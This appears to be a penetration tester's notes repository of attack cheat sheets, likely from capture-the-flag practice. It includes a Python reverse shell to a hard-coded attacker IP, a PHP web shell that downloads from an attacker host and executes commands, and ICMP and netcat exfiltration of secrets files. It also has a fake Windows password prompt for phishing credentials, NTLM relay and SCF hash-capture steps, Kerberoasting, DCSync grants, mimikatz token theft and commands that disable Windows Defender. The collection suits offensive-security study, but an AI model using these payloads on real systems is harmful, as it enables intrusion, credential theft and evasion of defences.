--------------------------------------------------------------------------------
 1 | #!/usr/bin/python3
 2 | import os
 3 | import sys
 4 | 
 5 | network = sys.argv[1]
 6 | 
 7 | # check the response
 8 | for i in range(1, 254):
 9 | 	cmd = f"ping -c 2 {network}.{i}" 
10 | 	response = os.system(cmd)
11 | 	
12 | 	if response == 0:
13 | 		successMsg = f"Online: {network}.{i}"
14 | 		os.system(f"echo {successMsg} >> ./online_hosts.txt")
15 | 	##
16 | ##
17 | 


--------------------------------------------------------------------------------
/windows/runas.txt:
--------------------------------------------------------------------------------
1 | Runas is the 'sudo' of Windows:
2 | 
3 | 	Step 1: check which creds are available for which user
4 | 		example: cmdkey /list
5 | 
6 | 	Step 2: check which user has creds saved and use those
7 | 		syntax : runas /savecred /user:<user> "cmd /c <cmd>"
8 | 		example: runas /savecred /user:Tyrell "cmd /c type C:\Users\Tyrell\Documents\secrets.txt > C:\Windows\Temp\nothing.txt"
9 | 


--------------------------------------------------------------------------------
/filetransfer/windows/tftp.txt:
--------------------------------------------------------------------------------
1 | Transfer files via tftp, which is quite old, but can still be available:
2 | 
3 | 	Step 1(host)  : atftpd --daemon --port 69 <directory>	#Specify which directory will be open to transactions
4 | 	Step 2(victim): tftp -i <hostIP> <method> <local/remoteFile>
5 | 	
6 | 	Example: tftp -i 192.168.0.124 GET remoteFile.txt
7 | 	Example: tftp -i 192.168.0.124 PUT localFile.txt
8 | 


--------------------------------------------------------------------------------
/filetransfer/windows/web_request.txt:
--------------------------------------------------------------------------------
1 | Transfer files via http with powershell:
2 | 	example: (New-Object System.Net.WebClient).DownloadFile('http://<hostIP>:<port>/<file>','C:\Users\<user>\Desktop\<file>')
3 | 	
4 | Transfer files with cmd.exe certutil (WILL GET CAUGHT BY ANTIVIRUS):
5 | 	Step 2(victim): certutil -urlcache -split -f http://<hostIP>:<port>/<file> C:\\Users\\<user>\\Downloads\\<outFile>
6 | 


--------------------------------------------------------------------------------
/remote_connection/psExec.txt:
--------------------------------------------------------------------------------
1 | Get 'psExec.py' from 'https://github.com/SecureAuthCorp/impacket/blob/master/examples/psexec.py'
2 | 
3 | This script is used for Windows privilege escalation after you have creds for admin/system accounts:
4 | 
5 | Step 1(attacker): sudo python psExec.py <user>:'<pass>'@<victimIP> <command>
6 | Example		: sudo python psExec.py Administrator:adminPass15@10.12.14.15 cmd.exe
7 | 


--------------------------------------------------------------------------------
/smb/smbmap.txt:
--------------------------------------------------------------------------------
 1 | Use smbmap to list available shares of a server and their permissions for a given user:
 2 | 	
 3 | 	syntax : smbmap -u <user> -p '<pass>' -H <targetIP>
 4 | 	example: smbmap -u tyrone -p '5cYHpc' -H 10.12.15.10
 5 | 
 6 | 
 7 | Use smbmap to check contents of an smb share recursively:
 8 | 	
 9 | 	syntax : smbmap -R <share> -H <targetIP>
10 | 	example: smbmap -R Public -H 10.12.25.10
11 | 


--------------------------------------------------------------------------------
/scripts/socketShell.py:
--------------------------------------------------------------------------------
 1 | import os
 2 | import pty
 3 | import socket
 4 | 
 5 | host = "10.10.14.19" #sys.argv[1]
 6 | port = 4444 		 #sys.argv[2]
 7 | addr = (host, port)
 8 | 
 9 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
10 | s.connect(addr)
11 | os.dup2(s.fileno(),0)
12 | os.dup2(s.fileno(),1)
13 | os.dup2(s.fileno(),2)
14 | os.putenv("HISTFILE", "/dev/null")
15 | pty.spawn("/bin/bash")
16 | 


--------------------------------------------------------------------------------
/filetransfer/windows/wget.txt:
--------------------------------------------------------------------------------
 1 | Use Powershell wget to transfer files to Windows
 2 | 	
 3 | 	Step 1(host): download 'wget.exe' from the internet
 4 | 	Step 1(host): open http server where the binary is located
 5 | 	Step 3(host): transfer the 'wget.exe' to the victim box
 6 | 
 7 | 	Step 4(victim):	
 8 | 		syntax : wget.exe http://<hostIP>:<port>/<file>
 9 | 		example: wget.exe http://192.168.0.145:8000/vuln.exe
10 | 


--------------------------------------------------------------------------------
/mail/imap/imapCurl.txt:
--------------------------------------------------------------------------------
1 | Use curl to connect to an IMAP server ('-k' is only needed with 'imaps', it's for SSL):
2 | 
3 | get all folders: curl -n imap(s)://<url> -X 'LIST "" "*"' (-k) --user "<username>:<password>"
4 | check folder   : curl -n imap(s)://myMail -X 'EXAMINE <folder>' (-k) --user "<username>:<password>"
5 | get message    : curl -n "imap(s)://<url>/<folder>;UID=<i>" (-k) --user "<username>:<password>"
6 | 


--------------------------------------------------------------------------------
/windows/file_permissions.txt:
--------------------------------------------------------------------------------
 1 | View file permissions in command line:
 2 | 
 3 | 	syntax : icacls <file>
 4 | 	example: icacls C:\"Program Files"\Vulnerabe\bin\Vulnerable.exe
 5 | 
 6 | 	syntax : cacls <file>
 7 | 	example: cacls C:\"Program Files"\Vulnerabe\bin\Vulnerable.exe
 8 | 
 9 | 
10 | 	Powershell:
11 | 
12 | 	syntax : Get-Acl <file>
13 | 	example: Get-Acl C:\"Program Files"\Vulnerabe\bin\Vulnerable.exe
14 | 
15 | 


--------------------------------------------------------------------------------
/networking/packets/icmpReadFile.txt:
--------------------------------------------------------------------------------
1 | Use this command on a server, then analyze the resulting file in Wireshark.
2 | 
3 | Linux:
4 | 	Step 1(host): sudo tcpdump -i <interface>	# sudo tcpdump -i eth0
5 | 	Step 2(target):
6 | 		syntax : xxd -p -c 16 [file(<filePath>)] | while read line; do ping -c 1 -p <hostIP>; done
7 | 		example: xxd -p -c 16 [file(/home/tyrone/secrets.txt)] | while read line; do ping -c 1 -p 10.12.22.32; done
8 | 


--------------------------------------------------------------------------------
/windows/active_directory/getDomainController.txt:
--------------------------------------------------------------------------------
 1 | A few commands to determine the domain controller of your domain
 2 | 
 3 | 	cmd:
 4 | 		example: echo %LOGONSERVER%
 5 | 		
 6 | 		syntax : nltest /dsgetdc:<domain_name>
 7 | 		example: nltest /dsgetdc:ecorp.local
 8 | 
 9 | 	powershell:
10 | 		example: Get-ADDomainController
11 | 		example: [System.Directoryservices.Activedirectory.Domain]::GetCurrentDomain()
12 | 
13 | 
14 | 


--------------------------------------------------------------------------------
/smb/smb_relay.txt:
--------------------------------------------------------------------------------
1 | Using an smb relay attack via MSSQL (use multiple terminals):
2 | 
3 | Step 1(term 1): sudo responder -I <interface> -rwF	# sudo responder -I eth0 -rwF
4 | Step 2(term 2): msfconsole				# metasploit
5 | Step 3(term 2): use admin/mssql/mssql_ntlm_stealer
6 | Step 4(term 2): set all the options (USER, PASS, RHOSTS, AUTH)
7 | Step 5(term 2): set DOMAIN <domain>			# set DOMAIN TYRONEPC
8 | Step 6(term 2): exploit
9 | 


--------------------------------------------------------------------------------
/filetransfer/scp.txt:
--------------------------------------------------------------------------------
 1 | SCP is a file-transfer method that works via ssh.
 2 | 
 3 | Transfer local files to remote machine:
 4 | 	syntax : scp <localFile> <victimUser>@<victimIP>:<remoteDirectory>
 5 | 	example: scp file.bak admin@192.168.84.34:/home/admin
 6 | 
 7 | Transfer remote files to local machine:
 8 | 	syntax : scp <victimUser>@<victimIP>:<victimDirectory> <localDirectory>
 9 | 	example: scp root@10.13.13.38:/root/capture.pcap ./
10 | 


--------------------------------------------------------------------------------
/bruteforce/patator.txt:
--------------------------------------------------------------------------------
1 | Patator is a multi-purpose bruteforcing tool
2 | 
3 | patator for SSH bruteforce
4 | 
5 | 	syntax : patator <module> host=<targetIP> port=<targetPort> user=<user> password=FILE0 0=<dictionary> persistent=0 -x ignore:mesg='<message>'
6 | 	example: patator ssh_login host=10.12.32.41 port=26478 user=tyrone password=FILE0 0=/opt/SecLists/Passwords/probable-v2-top1575.txt persistent=0 -x ignore:mesg='Authentication failed.'
7 | 


--------------------------------------------------------------------------------
/windows/check_services.txt:
--------------------------------------------------------------------------------
1 | Check all running services with powershell:
2 |     example: Get-Service | Format-List
3 | 
4 | Check permission on specific service with imported powershell script (https://rohnspowershellblog.wordpress.com/2013/03/19/viewing-service-acls/):
5 |     syntax : '<serviceName>' | Get-ServiceAcl | Select-Object -ExpandProperty Access
6 |     example: 'customServer' | Get-ServiceAcl | Select-Object -ExpandProperty Access
7 | 


--------------------------------------------------------------------------------
/forensics/volatility.txt:
--------------------------------------------------------------------------------
 1 | Use volatility to scan memory dumps
 2 | 
 3 | 	Step 1:
 4 | 		syntax : volatility -f <file> <option>
 5 | 		example: volatility -f S-20160105-221806.dmp imageinfo
 6 | 
 7 | 	Check the output for 'Suggested profiles' and select the appropriate OS version
 8 | 	Step 2: 
 9 | 		syntax : volatility -f <file> --profile <OS-Version> <option>
10 | 		example: volatility -f S-20160105-221806.dmp --profile Win2012R2x64 hashdump
11 | 	
12 | 


--------------------------------------------------------------------------------
/privesc/windows/unquoted-service-paths.txt:
--------------------------------------------------------------------------------
 1 | Check for services and the path to their binary:
 2 |     example: wmic service get name, pathname
 3 | 
 4 | Check permissions to directories to see if we can write there:
 5 |     syntax : Get-Acl -Path <path> | Format-List
 6 |     example: Get-Acl -Path C:\ | Format-List
 7 | 
 8 | Restart a service:
 9 |     syntax : powershell Start-Service <service>
10 |     example: powershell Start-Service sysmonitor
11 | 


--------------------------------------------------------------------------------
/infrastructure/windows.txt:
--------------------------------------------------------------------------------
 1 | All kinds of useful default infrastructure for Windows:
 2 | https://gracefulsecurity.com/path-traversal-cheat-sheet-windows/
 3 | 
 4 | 	Bypass applocker  : C:\Windows\System32\spool\drivers\color\
 5 | 	Temp directory    : C:\Windows\Temp\
 6 | 	MOF file directory: C:\Windows\System32\wbem\mof\
 7 | 
 8 | 	Default web directories:
 9 | 
10 | 		IIS   : C:\Inetpub\wwwroot\
11 | 		Wampp : C:\Wampp\www\
12 | 		Xampp : C:\Xampp\htdocs\
13 | 		
14 | 


--------------------------------------------------------------------------------
/filetransfer/nc.txt:
--------------------------------------------------------------------------------
 1 | Transfer files via nc:
 2 | 	
 3 | 	Linux:
 4 | 		Transfer a file from attacker to victim:
 5 | 			Step 1(victim)	: nc -lvnp <port> > <outFile>
 6 | 			Step 2(attacker): nc <victimIP> <port> < <outFile>
 7 | 
 8 | 	Windows:
 9 | 		Transfer a file from victim to attacker (upload nc.exe first or execute it through your smb server):
10 | 			Step 1(attacker): nc -lvnp <port> > <outFile>
11 | 			Step 2(victim)	: type <file> | .\nc.exe <attackerIP> <port>
12 | 


--------------------------------------------------------------------------------
/file_inclusion/uploadFile.txt:
--------------------------------------------------------------------------------
 1 | Check 'Hackthebox: Bastard' and Ippsec's video on it (https://www.youtube.com/watch?v=lP-E5vmZNC0 @ 6:40)
 2 | 
 3 | $phpCode = <<<'EOD'
 4 | <?php
 5 | 	if (isset($_REQUEST['fupload'])) {
 6 | 		file_put_contents($_REQUEST['fupload'], file_get_contents("http://10.10.14.15:8000/" . $_REQUEST['fupload']));
 7 | 	};
 8 | 
 9 | 	if (isset($_REQUEST['fexec'])) {
10 | 		echo "<pre>" . shell_exec($_REQUEST['fexec']) . "</pre>";
11 | 	};
12 | ?>
13 | EOD;
14 | 


--------------------------------------------------------------------------------
/google_dorks/dorks.txt:
--------------------------------------------------------------------------------
 1 | Use google dorks for passive information gathering about your target. (https://www.exploit-db.com/google-hacking-database)
 2 | 
 3 | 	examples:
 4 | 		
 5 | 		site: gmail.com
 6 | 		      # Check amount of results
 7 | 		 
 8 | 		site: gmail.com -site: www.gmail.com
 9 | 		      # To check subdomains
10 | 
11 |         site: "linkedin.com" "<companyName>"
12 | 
13 | 		intitle: index.php?id=
14 | 		inurl: index.php?id=
15 | 		filetype: pdf
16 |         
17 | 


--------------------------------------------------------------------------------
/windows/active_directory/powerview.txt:
--------------------------------------------------------------------------------
1 | Powerview is a great Powershell tool that can help with Windows Active Directory recon and exploitation (https://github.com/PowerShellMafia/PowerSploit).
2 | 
3 | Grant a domain user DCSync rights:
4 |     syntax : Add-DomainObjectAcl -TargetIdentity 'DC=<domain>,DC=<tld>' -PrincipalIdentity '<domainUser>' -Rights <right>
5 |     example: Add-DomainObjectAcl -TargetIdentity 'DC=allsafe,DC=com' -PrincipalIdentity 'e.alderson' -Rights DCSync
6 | 


--------------------------------------------------------------------------------
/scripts/iraw2png.pl:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/perl -w
 2 |  
 3 | $w = shift || 240;
 4 | $h = shift || 320;
 5 | $pixels = $w * $h;
 6 |  
 7 | open OUT, "|pnmtopng" or die "Can't pipe pnmtopng: $!\n";
 8 |  
 9 | printf OUT "P6%d %d\n255\n", $w, $h;
10 |  
11 | while ((read STDIN, $raw, 2) and $pixels--) {
12 |    $short = unpack('S', $raw);
13 |    print OUT pack("C3",
14 |       ($short & 0xf800) >> 8,
15 |       ($short & 0x7e0) >> 3,
16 |       ($short & 0x1f) << 3);
17 | }
18 |  
19 | close OUT;
20 | 


--------------------------------------------------------------------------------
/windows/prompt_credentials.txt:
--------------------------------------------------------------------------------
1 | Prompt a user for their password on a Windows computer using Powershell:
2 | 	syntax : $cred = $host.ui.promptforcredential('<message>','',[Environment]::UserDomainName+'\'+[Environment]::UserName,[Environment]::UserDomainName);$cred.getnetworkcredential().password
3 | 	example: $cred = $host.ui.promptforcredential('Failed Authentication','',[Environment]::UserDomainName+'\'+[Environment]::UserName,[Environment]::UserDomainName);$cred.getnetworkcredential().password
4 | 


--------------------------------------------------------------------------------
/certificates/generateCA.txt:
--------------------------------------------------------------------------------
1 | Use openssl to generate a new CA (https://gist.github.com/Soarez/9688998)
2 | 
3 | Step 1	: openssl genrsa -out <pkOutFile>.key 2048
4 | Optional: openssl rsa -in <pkOutFile>.key -pubout -out <pubOutFile>.pubkey	# generate public key from private key
5 | Step 2	: openssl req -new -key <pkOutFile>.key -out <csrOutFile>.csr		# generate a CSR (Certificate Signing Request)
6 | Step 3	: Submit the '.csr' file to an 'Active Directory Certificate Service'	# this is how you get the '.cer' file
7 | 


--------------------------------------------------------------------------------
/recon/usernames.txt:
--------------------------------------------------------------------------------
 1 | Get a list of valid names and use tools to create common corporate usernames.
 2 | 
 3 | namemash (https://gist.github.com/superkojiman/11076951):
 4 |     syntax : namemash.py <namesList> | tee <outFile>
 5 |     example: namemash.py employees.txt | tee usernames.txt
 6 | 
 7 |     # do the same but for creating an email list
 8 |     syntax : namemash.py <namesList> | sed 's/$/<domain>/g' | tee <outFile>
 9 |     example: namemash.py employees.txt | sed 's/$/@ecorp.com/g' | tee emails.txt
10 | 


--------------------------------------------------------------------------------
/scripts/byte_order_converter.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python3
 2 | # convert port number to network byte order
 3 | # NOTE: You do NOT need to convert the resulting hex into little-endian format, as this is already done by the ntohs() function
 4 | import socket
 5 | import sys
 6 | 
 7 | if len(sys.argv) != 2:
 8 |     print(f"Usage: {sys.argv[0]} <port>")
 9 |     print(f"Usage: {sys.argv[0]} 443")
10 | ##
11 | 
12 | port = int(sys.argv[1])
13 | 
14 | converted_port = socket.ntohs(port)
15 | print(hex(converted_port))
16 | 


--------------------------------------------------------------------------------
/scripts/psMonitor.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | echo "Looking for new processes..."
 4 |  
 5 | # script to find processes
 6 | # loop by newline, default is by space
 7 | IFS=$'\n'
 8 | 
 9 | # get all commands in processes
10 | oldProcess=$(ps -eo command)
11 | 
12 | while true; do
13 |         newProcess=$(ps -eo command)
14 | 	# find difference between old and new process
15 |         diff <(echo "$oldProcess") <(echo "$newProcess") | grep [\<\>]
16 |         sleep 1
17 |         oldProcess=$newProcess
18 | done
19 | 


--------------------------------------------------------------------------------
/recon/smtp_enum.txt:
--------------------------------------------------------------------------------
 1 | Use ncat to enumerate smtp:
 2 | 	
 3 | 	Step 1:
 4 | 	syntax : nc -nv <targetIP> 25
 5 | 	example: nc -nv 12.12.31.14 25
 6 | 	
 7 | 	verify : VRFY <username>	#250 OK, 550 BAD
 8 | 
 9 | 
10 | Use ncat oneliner to enumerate users (have a file with usernames):
11 | 	
12 | 	syntax : for user in $(cat <namesFile>); do echo VRFY $user | nc -nv -w 1 <targetIP> 25 2>/dev/null | grep ^"250"; done
13 | 	example: for user in $(cat usernames.txt); do echo VRFY $user | nc -nv -w 1 10.12.32.43 25 2>/dev/null | grep ^"250"; done
14 | 


--------------------------------------------------------------------------------
/windows/get_os.txt:
--------------------------------------------------------------------------------
 1 | Get the current Machine's Windows version:
 2 | 
 3 | 	cmd:
 4 | 		example: systeminfo
 5 | 		example: wmic os
 6 | 		example: REG QUERY "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion" | findstr REG_SZ
 7 | 		example: REG QUERY "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion" | findstr ReleaseId
 8 | 	
 9 | 	powershell:
10 | 		example: (Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion")
11 | 		example: (Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion").ReleaseId
12 | 		
13 | 


--------------------------------------------------------------------------------
/networking/firewall.txt:
--------------------------------------------------------------------------------
 1 | Set firewall to open a specific port:
 2 | 
 3 | 	syntax : sudo firewall-cmd --zone=<zone> --add-port=<port>/<protocol> --permanent
 4 | 	example: sudo firewall-cmd --zone=public --add-port=80/tcp --permanent
 5 | 		 
 6 | 		 sudo firewall-cmd --reload 
 7 | 
 8 | Set firewall to close a specific port:
 9 | 
10 | 	syntax : sudo firewall-cmd --zone=<zone> --remove-port=<port>/<protocol> --permanent
11 | 	example: sudo firewall-cmd --zone=public --remove-port=161/udp --permanent
12 | 
13 | 		 sudo firewall-cmd --reload 
14 | 


--------------------------------------------------------------------------------
/windows/active_directory/kerberoasting.txt:
--------------------------------------------------------------------------------
1 | Kerberoast remotely from a Linux host via Impacket script (through a SOCKS proxy or whatever):
2 |     syntax : python /opt/Impacket/examples/GetUserSPNs.py -request -dc-ip <domainControllerIP> <domainName>/<domainUser>:<domainUserPass> -outputfile <outFile>
3 |     example: python /opt/Impacket/examples/GetUserSPNs.py -request -dc-ip 10.83.20.10 ECORP/tyrell:S3cureP4ss5 -outputfile tgs.txt
4 | 
5 | Kerberoast locally from the victim machine as a domain user with Rubeus:
6 | 	example: Rubeus.exe kerberoast 
7 | 


--------------------------------------------------------------------------------
/networking/packets/sniffPackets.py:
--------------------------------------------------------------------------------
 1 | from scapy.all import *;
 2 | 
 3 | def processPacket(packet):
 4 |     if packet.haslayer(ICMP):
 5 |         if packet[ICMP].type == 8: # make sure it's the request packet
 6 |             packetData = packet[ICMP].load[-4:]
 7 |                 print(packetData.decode("utf-8"), flush=True, end='');
 8 |                 #print(f'{packetData.decode("utf-8")}', flush=True, end='');
 9 |         ##
10 |     ##
11 | 
12 | ##
13 | 
14 | 
15 | # on every sniff, it does 'processPacket'
16 | sniff(iface='tun0', prn=processPacket);
17 | 


--------------------------------------------------------------------------------
/pivoting/portForwarding.txt:
--------------------------------------------------------------------------------
 1 | Use rinetd to use your local linux machine as a proxy to bypass restrictions set on another machine:
 2 | 
 3 | 	Step 1(host): open /etc/rinetd.conf
 4 | 	Step 2(host): write following contents
 5 | 		
 6 | 		#bindaddress	bindport  	connectaddress  connectport
 7 | 		<localIP>	<localPort>	<remoteIP>	<remotePort>
 8 | 	
 9 | 	example: 192.168.0.112	80		10.10.145.122	1331
10 | 
11 | 	Step 3(host): /etc/init.d/rinetd restart
12 | 	# Now any machine that connects to this machine on port 80 will be redirected to <remoteIP>:<remotePort
13 | 


--------------------------------------------------------------------------------
/smb/mount_shares.txt:
--------------------------------------------------------------------------------
1 | You can mount remote shares with the following command:
2 | 	syntax : mount -t <type> //<targetIP>/<share> /mnt/<mntPoint> -o <options> (username=,password=)
3 | 	example: mount -t cifs //10.40.12.59/ACCT /mnt/smb/ -o username=Accounting,password=Accountancy1 	# cifs = Common Internet File System (implementation of SMB)
4 | 
5 | Mount vhd files:
6 | 	syntax : guestmount --add <file>.vhd --inspector --<read/write> /mnt/<dir>
7 | 	example: guestmount --add windowsbackup.vhd --inspector --ro /mnt/vhd/		# --ro -> read-only, --rw -> read-write
8 | 


--------------------------------------------------------------------------------
/windows/ads.txt:
--------------------------------------------------------------------------------
 1 | ADS = Alternate Data Streams
 2 | ADS is a way to hide data in files from the standard means of viewing files. To read ADS in a file via powershell, do the following:
 3 | (Copying these files over to linux might erase the ADS, because it's part of NTFS)
 4 | 	
 5 | 	# Powershell
 6 | 	Step 1(victim): get-item <file> -stream *
 7 | 
 8 | 	# Check the stream names if there are any -> <stream>
 9 | 
10 | 	Step 2(victim): get-content <file> -stream <stream>
11 | 	
12 | 	# cmd
13 | 	Alternate step 2(victim): more < file.txt:Zone-Identifier > data.txt
14 | 


--------------------------------------------------------------------------------
/port_knocking/portKnock.txt:
--------------------------------------------------------------------------------
1 | Port knocking is a security measure that keeps a port closed, until a prespecified amount of ports have been connected to in a certain sequence,
2 | after which that closed port opens up.
3 | 
4 | Check out '/etc/iptables/rules.v4' and 'iptables -L'
5 | Check out '/etc/init.d/knockd', '/etc/default/knockd' for config on the target box
6 | 
7 | syntax : for i in <ports>; do sudo nmap -Pn -p $i --host-timeout 201 --max-retries 0 <targetIP>; done
8 | example: for i in 555 230 911 444; do sudo nmap -Pn -p $i --host-timeout 201 --max-retries 0 12.32.44.12; done
9 | 


--------------------------------------------------------------------------------
/azure_ad/post_exploitation.txt:
--------------------------------------------------------------------------------
 1 | Commands to use after exploiting an Azure AD-joined machine:
 2 | 
 3 | Mimikatz:
 4 |     Extract Primary Refresh Token, session key, tenant ID:
 5 |         example: mimikatz "privilege::debug" "sekurlsa::cloudap" exit
 6 | 
 7 |     Extract context key and derived key (use session key from sekurlsa::cloudap command):
 8 |         syntax : mimikatz "privilege::debug" "token::elevate" "dpapi::cloudapkd /keyvalue:<sessionKey> /unprotect" exit
 9 |         example: mimikatz "privilege::debug" "token::elevate" "dpapi::cloudapkd /keyvalue:"AQAAA..." /unprotect" exit
10 | 


--------------------------------------------------------------------------------
/smb/setup.txt:
--------------------------------------------------------------------------------
 1 | Different ways to setup an smb share on linux (Kali):
 2 | 
 3 | 	impacket:
 4 | 		
 5 | 		syntax : impacket-smbserver <shareName> (<versionSupport>) <directory>
 6 | 		example: impacket-smbserver kali .
 7 | 		example: impacket-smbserver hacker -smb2support /var/smb
 8 | 
 9 | 	smbd service:
10 | 
11 | 		Step 1: edit /etc/samba/smb.conf
12 | 			# Add the following to the file at the bottom:
13 | 			[<shareName>]
14 | 		        	path = <directory>
15 |         			browseable = yes
16 |         			read only = no
17 |         			guest ok = yes
18 | 
19 | 		Step 2: service smbd start
20 | 


--------------------------------------------------------------------------------
/recon/onesixtyone.txt:
--------------------------------------------------------------------------------
 1 | Use this command to bruteforce snmp commnity strings:
 2 | 
 3 | 	syntax : onesixtyone -c <dictionary> <targetIP>
 4 | 	example: onesixtyone -c /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt 10.13.10.92
 5 | 
 6 | 
 7 | Use onesixtyone to check for available community strings in range of IP's
 8 | 
 9 | 	Step 1 : for i in $(seq 1 254); do echo 12.12.12.$i; done > <ipRangeFile>
10 | 	syntax : onesixtyone -c <communityStringsFile> -i <ipRangeFile>
11 | 	example: onesixtyone -c /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt -i ips.txt
12 | 


--------------------------------------------------------------------------------
/scripts/zonetransfer.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | # This is a simple zone transfer script for dns enumeration
 4 | 
 5 | 
 6 | if [ -z "$1" ]
 7 | then
 8 | 	echo "[*] Simple Zone Transfer Script"
 9 | 	echo "[*] Usage	    : $0 <domain name>"
10 | 	exit 0
11 | fi
12 | 
13 | for server in $(host -t ns $1 | cut -d " " -f 4)
14 | do
15 | 	echo $server
16 | 	echo "-------------------------------------------------------------------------------"
17 | 	host -l $1 $server | grep "has address"
18 | 	echo "-------------------------------------------------------------------------------"
19 | 	sleep 0.5
20 | done
21 | 


--------------------------------------------------------------------------------
/windows/enable_rdp.txt:
--------------------------------------------------------------------------------
 1 | Enable Remote Desktop on a windows machine via terminal:
 2 | 	
 3 | 	# Start up the RDP service
 4 | 	Step 1(victim)	: reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0
 5 | 
 6 | 	# Configure firewall to let connections in
 7 | 	Step 2(victim)	: netsh firewall set service remoteadmin enable
 8 | 	Step 3(victim)	: netsh firewall set service remotedesktop enable
 9 | 	Optional(victim): net localgroup "Remote Desktop Users" /add <user>
10 | 	Step 4(attacker): rdesktop <victimIP>
11 | 	Step 5(attacker): enter credentials
12 | 


--------------------------------------------------------------------------------
/post_exploitation/windows/disable_monitoring.txt:
--------------------------------------------------------------------------------
 1 | Disable firewall as administrator to execute post-exploitation scripts such as mimikatz:
 2 | 
 3 | 	Disable monitoring (Powershell):
 4 | 		example: Set-MpPreference -DisableRealtimeMonitoring $true
 5 | 
 6 | 	Enable monitoring (Powershell):
 7 | 		example: Set-MpPreference -DisableRealtimeMonitoring $false
 8 | 
 9 | 	Disable Windows Defender (cmd):
10 | 		Step 1: sc config WinDefend start= disabled
11 | 		Step 2: sc stop WinDefend
12 | 
13 | 	Enable Windows Defender (cmd):
14 | 		Step 1: sc config WinDefend start= auto
15 | 		Step 2: sc start WinDefend
16 | 


--------------------------------------------------------------------------------
/restricted_shell/methods.txt:
--------------------------------------------------------------------------------
 1 | All kinds of ways I've used to escape linux restricted shells
 2 | 
 3 | A simple escape by just switching to another shell:
 4 | 
 5 | 	command: /bin/bash
 6 | 	command: /bin/sh
 7 | 	command: bash
 8 | 	command: sh
 9 | 
10 | Escape a restricted linux shell with the 'echo' command:
11 | 
12 | 	command: echo os.system('/bin/bash')
13 | 		 # Requires Python on the box
14 | 
15 | Escape by setting PATH variable:
16 | 
17 | 	command: export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
18 | 
19 | Escape by a command-line text-editor:
20 | 
21 | 	command: :!/bin/sh
22 | 


--------------------------------------------------------------------------------
/smb/smb_scf.txt:
--------------------------------------------------------------------------------
 1 | https://pentestlab.blog/2017/12/13/smb-share-scf-file-attacks/
 2 | 
 3 | Step 1: Connect to the target's samba share and find somewhere you can upload files to (preferably '\Users\Public\'.
 4 | Step 2: On your box, do 'sudo impacket-smbserver -smb2support <share> ./'
 5 | Step 3: On your own box, make a file '@anyfile.scf' and enter the following:
 6 | 	[Shell]
 7 | 	Command=2
 8 | 	IconFile=\\<yourIP>\<share>\
 9 | 	[Taskbar]
10 | 	Command=ToggleDesktop
11 | 
12 | Step 3: Upload '@anyfile.scf' to a folder on the target's samba share.
13 | Step 4: Wait for a user to open the file and you get their hash.
14 | 


--------------------------------------------------------------------------------
/databases/sql/mssql/sqsh.txt:
--------------------------------------------------------------------------------
 1 | SQL interactive shell to connect with SQL server:
 2 | 
 3 | 	syntax : sqsh -S <targetIP> -U <user> -P <password>
 4 | 	example: sqsh -S 10.12.12.32 -U sa -P MyP4ssW0RD 
 5 | 
 6 | 
 7 | Enable xp_cmdshell to execute system commands(https://www.youtube.com/watch?v=l-wzBhc9wFc 26:22):
 8 | 	
 9 | 	Step 1(host): EXEC SP_CONFIGURE 'show advanced options', 1
10 | 	Step 2(host): reconfigure
11 | 	Step 3(host): go
12 | 	Step 4(host): EXEC SP_CONFIGURE 'xp_cmdshell', 1
13 | 	Step 5(host): reconfigure
14 | 	Step 6(host): go
15 | 
16 | 	Optional step 7(host): xp_cmdshell 'whoami'
17 | 	Optional Step 7(host): go
18 | 


--------------------------------------------------------------------------------
/databases/sql/oracle/cli.txt:
--------------------------------------------------------------------------------
 1 | Command line commands for oracle cli (https://www.youtube.com/watch?v=2c7SzNo9uoA)
 2 | 
 3 | 
 4 | Basic commands:
 5 | 	select * from sessions_privs;
 6 | 	select table_name from user_tables;
 7 | 
 8 | Read a file on disk (enter after each line):
 9 | 
10 | 	declare
11 | 	f utl_file.file_type;
12 | 	s varchar(200);
13 | 	begin
14 | 	f := utl_file.fopen('/inetpub/wwwroot', 'iisstart.htm', 'R');
15 | 	utl_file.get_line(f,s);
16 | 	utl_file.fclose(f);
17 | 	dbms_output.put_line(s);
18 | 	end;
19 | 	/
20 | 	set serveroutput on
21 | 	/
22 | 
23 | 	# f := utl_file.fopen('<filePath>', '<file>', '<IO-Mode>');
24 | 


--------------------------------------------------------------------------------
/remote_connection/ssh.txt:
--------------------------------------------------------------------------------
 1 | Connect to a box remotely via ssh
 2 | 
 3 | ssh with password authentication:
 4 | 	syntax : ssh -p <port> <user>@<targetIP>   # ssh port is usually 22, but if it's different, you can specify the port with -p
 5 | 	example: shh -p 2201 tyrone@10.23.13.41
 6 | 
 7 | 
 8 | ssh with key-file authentication:
 9 | 	syntax : ssh -i <keyFile> <user>@<targetIP>
10 | 	example: ssh -i tyrone.ssh tyrone@10.15.10.87
11 | 
12 | 
13 | ssh with specific algorithm:
14 | 	syntax : ssh -p <port> -oKexQlgorithms=+<algorithm> <user>@<targetIP>
15 | 	example: ssh -p 22222 -oKexAlgorithms=+diffie-hellman-group1-sha1 bob@10.65.16.76
16 | 


--------------------------------------------------------------------------------
/tokens/jwt.txt:
--------------------------------------------------------------------------------
 1 | Create a jwt token with python3:
 2 | 
 3 | 	python3 (pip3 install pyjwt):
 4 | 	    	import jwt
 5 |     		encoded = jwt.encode({"admin":"true","access_code":"C0B137FE2D792459F26FF763CCE44574A5B5AB03"}, 'key=secur3_p4ss', algorithm='HS256')
 6 | 	    	print(encoded)
 7 | 
 8 | Send a jwt authorization token to target API via curl:
 9 | 
10 | 	syntax : curl <url> -H 'Authorization: Bearer <jwtToken>'
